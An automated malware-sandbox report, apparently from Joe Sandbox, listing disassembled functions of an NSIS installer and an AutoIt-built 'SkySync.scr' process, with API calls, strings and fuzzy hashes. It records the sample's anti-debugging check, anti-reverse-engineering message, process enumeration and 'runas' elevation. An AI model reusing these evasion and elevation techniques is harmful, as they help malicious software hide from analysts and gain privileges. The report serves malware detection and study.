Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: SkySync.scrPID: 8704, Parent PID: 8660COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	177

Executed Functions

Function 00AA5240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AA526C
IsDebuggerPresent.KERNEL32 ref: 00AA527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00AA52E6

Part of subcall function 00A9BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A9BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00AA5366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00AE0B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B46D10), ref: 00AE0BE9
ShellExecuteW.SHELL32(00000000), ref: 00AE0BF0

Part of subcall function 00AA514C: GetSysColorBrush.USER32(0000000F), ref: 00AA5156
Part of subcall function 00AA514C: LoadCursorW.USER32(00000000,00007F00), ref: 00AA5165
Part of subcall function 00AA514C: LoadIconW.USER32(00000063), ref: 00AA517C
Part of subcall function 00AA514C: LoadIconW.USER32(000000A4), ref: 00AA518E
Part of subcall function 00AA514C: LoadIconW.USER32(000000A2), ref: 00AA51A0
Part of subcall function 00AA514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA51C6
Part of subcall function 00AA514C: RegisterClassExW.USER32(?), ref: 00AA521C

Part of subcall function 00AA50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA5109
Part of subcall function 00AA50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA512A
Part of subcall function 00AA50DB: ShowWindow.USER32(00000000), ref: 00AA513E
Part of subcall function 00AA50DB: ShowWindow.USER32(00000000), ref: 00AA5147

Part of subcall function 00AA59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA5A9E

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00AE0B28
AutoIt, xrefs: 00AE0B23
runas, xrefs: 00AE0BE4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 1385234928-2030392706
Opcode ID: c00eb1d08753692e3d3c41583a15a77431c7c7df37909186f1e0ca627af08849
Instruction ID: 65c704245f8365d686701d32e173ccbddcf0c20211f8b8dacd509aa625fb82ad
Opcode Fuzzy Hash: c00eb1d08753692e3d3c41583a15a77431c7c7df37909186f1e0ca627af08849
Instruction Fuzzy Hash: 32510431E48248AACF11ABB0ED56EFE7B74AB4B341F1000E5F851671E2CFA14549CB25

Function 00AA5D13 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00AA5D40
GetCurrentProcess.KERNEL32(?,00B20A18,00000000,00000000,?), ref: 00AA5E07
IsWow64Process.KERNEL32(00000000), ref: 00AA5E0E
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00AA5E54
FreeLibrary.KERNEL32(00000000), ref: 00AA5E5F
GetSystemInfo.KERNEL32(00000000), ref: 00AA5E90
GetSystemInfo.KERNEL32(00000000), ref: 00AA5E9C

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64
String ID:
API String ID: 2813406015-0
Opcode ID: d64209910131782689c66c7fae1b0c1ad0fe5513bd3115e364ac63d9fb2e7b04
Instruction ID: be701597b893d73c348f68789979b12dce514de7f7706dba9f20f659a2418be8
Opcode Fuzzy Hash: d64209910131782689c66c7fae1b0c1ad0fe5513bd3115e364ac63d9fb2e7b04
Instruction Fuzzy Hash: B791C531989BC4DEC731DB7884505AAFFF56F2A300B884A5ED0C793A82D730A648C76D

Function 00AF4148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00AF416D
Process32FirstW.KERNEL32(00000000,?), ref: 00AF417B
Process32NextW.KERNEL32(00000000,?), ref: 00AF419B
CloseHandle.KERNELBASE(00000000), ref: 00AF4245

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 731597ea4bfbbacd28520d763700e5f814be759c556a9e8ac60eff76e484278c
Instruction ID: 079c27451de52db490cefd391e006c10e0bdd80307a58f351076c1d17743f820
Opcode Fuzzy Hash: 731597ea4bfbbacd28520d763700e5f814be759c556a9e8ac60eff76e484278c
Instruction Fuzzy Hash: DA318071108345AFD310EF90D885ABFBBE8AF99350F00052DF685831E1EB719A49CB52

Function 00A9BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00A9BF57

Part of subcall function 00A952B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A952E6

Sleep.KERNEL32(0000000A,?,?), ref: 00AD36B5

Strings

CALL, xrefs: 00A9C277
@GUI_WINHANDLE, xrefs: 00AD37C1
@COM_EVENTOBJ, xrefs: 00AD3D2E
@GUI_CTRLID, xrefs: 00AD376C
@GUI_CTRLHANDLE, xrefs: 00AD3816
@TRAY_ID, xrefs: 00AD3FCD

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: 6ae4c3a90d091aa95d3bf73eb9594c9e45e2f089fd56c480378b688b27670d27
Instruction ID: 8ec010973d8b9a6f9f4b42d66d4d8cc02c82fb686d3777543a29616502a6b939
Opcode Fuzzy Hash: 6ae4c3a90d091aa95d3bf73eb9594c9e45e2f089fd56c480378b688b27670d27
Instruction Fuzzy Hash: 36C2BE71608341DFDB24DF24C994BAAB7E4BF84304F14891EF48A9B3A1CB71E945CB92

Function 00A933E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 70
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A93444
RegisterClassExW.USER32(00000030), ref: 00A9346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A9347F
InitCommonControlsEx.COMCTL32(?), ref: 00A9349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A934AC
LoadIconW.USER32(000000A9), ref: 00A934C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A934D1

Strings

TaskbarCreated, xrefs: 00A93474
0, xrefs: 00A93426
AutoIt v3 GUI, xrefs: 00A93460
+, xrefs: 00A9342D

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 0d6130f163bbd24a04d7256507745caf52e7b31fc4dee6dbfabf38b7805fc3ed
Instruction ID: 1187f6319398701bad5c6c0b50453a9371bf8a0357c2545cdeef105b2ced6559
Opcode Fuzzy Hash: 0d6130f163bbd24a04d7256507745caf52e7b31fc4dee6dbfabf38b7805fc3ed
Instruction Fuzzy Hash: EA314971950309AFEB50DFA4E888BD9BBF0FB08311F10415AE594A72A1DBB51582CF50

Function 00A93411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A93444
RegisterClassExW.USER32(00000030), ref: 00A9346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A9347F
InitCommonControlsEx.COMCTL32(?), ref: 00A9349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A934AC
LoadIconW.USER32(000000A9), ref: 00A934C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A934D1

Strings

TaskbarCreated, xrefs: 00A93474
0, xrefs: 00A93426
AutoIt v3 GUI, xrefs: 00A93460
+, xrefs: 00A9342D

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 66c201cd84593228576b7c8fbfc224c1d87f121f3c66e78d01422c03abbc30b1
Instruction ID: 2ccaea2f2da4fc0e3c2c3dbd28051cd802cce29b5e8eae59f68b9346ee36246a
Opcode Fuzzy Hash: 66c201cd84593228576b7c8fbfc224c1d87f121f3c66e78d01422c03abbc30b1
Instruction Fuzzy Hash: 7221E2B1E55319AFEB10AFA5EC88B9EBBF4FB08701F00415AF614A72A1DBB11541CF91

Function 00AA514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA5156
LoadCursorW.USER32(00000000,00007F00), ref: 00AA5165
LoadIconW.USER32(00000063), ref: 00AA517C
LoadIconW.USER32(000000A4), ref: 00AA518E
LoadIconW.USER32(000000A2), ref: 00AA51A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA51C6
RegisterClassExW.USER32(?), ref: 00AA521C

Part of subcall function 00A93411: GetSysColorBrush.USER32(0000000F), ref: 00A93444
Part of subcall function 00A93411: RegisterClassExW.USER32(00000030), ref: 00A9346E
Part of subcall function 00A93411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A9347F
Part of subcall function 00A93411: InitCommonControlsEx.COMCTL32(?), ref: 00A9349C
Part of subcall function 00A93411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A934AC
Part of subcall function 00A93411: LoadIconW.USER32(000000A9), ref: 00A934C2
Part of subcall function 00A93411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A934D1

Strings

#, xrefs: 00AA5201
0, xrefs: 00AA51FA
AutoIt v3, xrefs: 00AA520B

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 5676e05c240a4fe5e99b150c43bd385bd0da27407afbf953f522b38d8012d819
Instruction ID: 9ed26828eeaf71fa00f360a7b29c3dd7774e8f7da860ffddb12e6cdfdfb5a658
Opcode Fuzzy Hash: 5676e05c240a4fe5e99b150c43bd385bd0da27407afbf953f522b38d8012d819
Instruction Fuzzy Hash: FC214B71E94308AFEB109FA4FD09B9D7BB4FB19312F000199F504A72A1DFB669508F84

Function 00AA4D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00AA4E22
KillTimer.USER32(?,00000001), ref: 00AA4E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA4E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA4E7A
CreatePopupMenu.USER32 ref: 00AA4E8E
PostQuitMessage.USER32(00000000), ref: 00AA4EAF

Strings

TaskbarCreated, xrefs: 00AA4E75

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 0a24273df1f0a62366e09e14571ce5b3f0c51481e18ad8807d03cce108aaa0dd
Instruction ID: e5911a7d104dc6bddbd304eee04c587489cca2c829728a29934dbb38aa958fd4
Opcode Fuzzy Hash: 0a24273df1f0a62366e09e14571ce5b3f0c51481e18ad8807d03cce108aaa0dd
Instruction Fuzzy Hash: 0B412731344205ABEB316F28AD09BBAB6A5F7CB302F000165F901931E2CFE59C519B61

Function 00AC108B Relevance: 15.7, APIs: 10, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1300298e1449ef4c45a7c9b24cb93f31ec0b33e2d29bbb6d3c6e8a0a20017693
Instruction ID: 2967cee05cbb84f693e6ab49c811eda4f58e46a04b4f1c891dcecb85a510ddf1
Opcode Fuzzy Hash: 1300298e1449ef4c45a7c9b24cb93f31ec0b33e2d29bbb6d3c6e8a0a20017693
Instruction Fuzzy Hash: B4321774B04245DFDB21CF58C881FAD7BB1AF57314F2A419EE895AB293CB349842CB61

Function 00A9AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A9ADE1
CoUninitialize.COMBASE ref: 00A9AE80
UnregisterHotKey.USER32(?), ref: 00A9AFD7
DestroyWindow.USER32(?), ref: 00AD2F64
FreeLibrary.KERNEL32(?), ref: 00AD2FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AD2FF6

Strings

close all, xrefs: 00A9ADDC

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 5b2055b48e6f4e6b5005b21c7d14221ba78b2e35b51767a01082b06b91f98c68
Instruction ID: 68e8dc5c928322ed5d654ff45cbd9a6d0357d5aaf9b4f2cfe7e5f23d0ea3872c
Opcode Fuzzy Hash: 5b2055b48e6f4e6b5005b21c7d14221ba78b2e35b51767a01082b06b91f98c68
Instruction Fuzzy Hash: E3A15E717012229FCF29EF54C595B69F7B4BF14700F1442AEE90AAB262DB31AD12CF91

Function 00AA2FC5 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AB00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00AA3094), ref: 00AB00ED

Part of subcall function 00AB08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00AA309F), ref: 00AB08E3

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AA30E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AE01BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AE01FB
RegCloseKey.ADVAPI32(?), ref: 00AE0239

Strings

Software\AutoIt v3\AutoIt, xrefs: 00AA30D8
\Include\, xrefs: 00AA309F
Include, xrefs: 00AE01B1, 00AE01F2
\, xrefs: 00AE02B5

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 338900592-2727554177
Opcode ID: 8c228e36532da143b79c95caca766db458a5f4e304006204576efb65841ce38a
Instruction ID: 2455614ab23ac97834d6e6ff8f2ddbdd6d1567e6a100710a7e372a01644dcf0a
Opcode Fuzzy Hash: 8c228e36532da143b79c95caca766db458a5f4e304006204576efb65841ce38a
Instruction Fuzzy Hash: BE718C71509301AEC310EF65E981AABBBE8FF89341F40056EF549D71B1EF719988CB92

Function 00AC807E Relevance: 12.9, APIs: 6, Strings: 1, Instructions: 627COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AC8335
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC834F
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AC8372
CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 00AC8384
CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 00AC874A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AC8776

